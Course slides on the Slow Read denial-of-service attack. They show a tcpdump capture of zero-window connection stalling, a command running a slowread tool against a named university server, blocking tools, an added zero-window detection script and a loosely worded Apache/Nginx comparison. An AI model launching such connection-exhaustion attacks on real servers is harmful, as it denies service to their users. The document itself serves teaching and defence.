FACULTY OF ENGINEERING AT UNIVERSITY OF PORTO
COMPUTER SYSTEMS SECURITY
Exhaust server connections
Require a low amount of resources and bandwidth
"A TCP MAY keep its offered receive window closed indefinitely. As long as the receiving TCP continues to send acknowledgements in response to the probe segments, the sending TCP MUST allow the connection to stay open."
- RFC 1122
16:57:44 attacker > ni.fe.up.pt: Flags [S], seq 3187993640, win 29200, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [S], seq 3930293194, win 1152, length 0
16:57:44 ni.fe.up.pt > attacker: Flags [S.], seq 4063001143, ack 3187993641, win 28960, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [.], ack 1, win 229, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [P.], seq 1:177, ack 1, win 229, length 176
16:57:44 ni.fe.up.pt > attacker: Flags [S.], seq 3470787838, ack 3930293195, win 28960, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [.], ack 1, win 1152, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [P.], seq 1:177, ack 1, win 1152, length 176
16:57:44 ni.fe.up.pt > attacker: Flags [.], ack 177, win 235, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [.], ack 4526, win 0, length 0
16:57:45 ni.fe.up.pt > attacker: Flags [.], ack 528, win 243, length 0
16:57:45 attacker > ni.fe.up.pt: Flags [.], ack 4526, win 0, length 0
16:57:45 ni.fe.up.pt > attacker: Flags [.], ack 528, win 243, length 0
16:57:45 attacker > ni.fe.up.pt: Flags [.], ack 4526, win 0, length 0
16:57:46 ni.fe.up.pt > attacker: Flags [.], ack 528, win 243, length 0
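Added example (not from the original slides or the slowread-rs project): a Python check that reads tcpdump text in the format of the capture above and reports peers that keep acknowledging the same byte with a zero window, the persist-state pattern the capture shows. The sample lines, the host names and the `min_repeats` threshold are constructed assumptions; with a capture that includes ports, the peer key becomes host.port and the check works per connection.

```python
import re
from collections import defaultdict

# Constructed sample in the same tcpdump format as the capture above
# (host names "client-a" / "client-b" / "server" are made up).
SAMPLE = """\
16:57:44 client-a > server: Flags [.], ack 4526, win 0, length 0
16:57:45 server > client-a: Flags [.], ack 528, win 243, length 0
16:57:45 client-a > server: Flags [.], ack 4526, win 0, length 0
16:57:45 server > client-a: Flags [.], ack 528, win 243, length 0
16:57:46 client-a > server: Flags [.], ack 4526, win 0, length 0
16:57:46 client-b > server: Flags [.], ack 4526, win 0, length 0
16:57:47 client-b > server: Flags [.], ack 9001, win 512, length 0
"""

# time, source, destination, flags, ack number, window, payload length
LINE = re.compile(r"^(\S+) (\S+) > (\S+): Flags \[([^\]]*)\],.*?"
                  r"\back (\d+), win (\d+), length (\d+)")

def stalled_receivers(text, server, min_repeats=3):
    """Return {peer: longest run} of identical zero-window ACKs sent to server."""
    streak = {}                    # peer -> (last ack number, current run length)
    worst = defaultdict(int)       # peer -> longest run seen
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue               # SYN without ack, or an unrelated line
        _, src, dst, flags, ack, win, length = m.groups()
        # Only client-to-server segments on established connections matter.
        if dst != server or any(f in flags for f in "SRF"):
            continue
        if int(win) == 0 and int(length) == 0:
            last_ack, run = streak.get(src, (None, 0))
            run = run + 1 if ack == last_ack else 1
            streak[src] = (ack, run)
            worst[src] = max(worst[src], run)
        else:
            streak.pop(src, None)  # window reopened or data sent: reset the run
    return {p: n for p, n in worst.items() if n >= min_repeats}

if __name__ == "__main__":
    print(stalled_receivers(SAMPLE, "server"))
```

A legitimate slow client can also advertise a zero window for a short time, so the threshold should be tuned against normal traffic before the result feeds a block rule.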
Uses the HTTP protocol as a means
Practically no new requests
Probably, max thread-pool error
And use something to block:
iptables
route
ip
$ ./slowread -a https://ni.fe.up.pt/images/projects/PKyl13EDPj3HLxF4.png
https://github.com/bernardobelchior/slowread-rs
Overall protections
Particular protections
Apache
Nginx
In terms of handling connections, Apache has a maximum number of simultaneous connections that it can handle, while Nginx does not have a maximum number of connections and instead uses a scalable event-driven architecture to manage them. Apache receives requests and handles them by itself, whereas Nginx ignores them and lets them run in the background, needing to process only the connections that have some logic associated with them.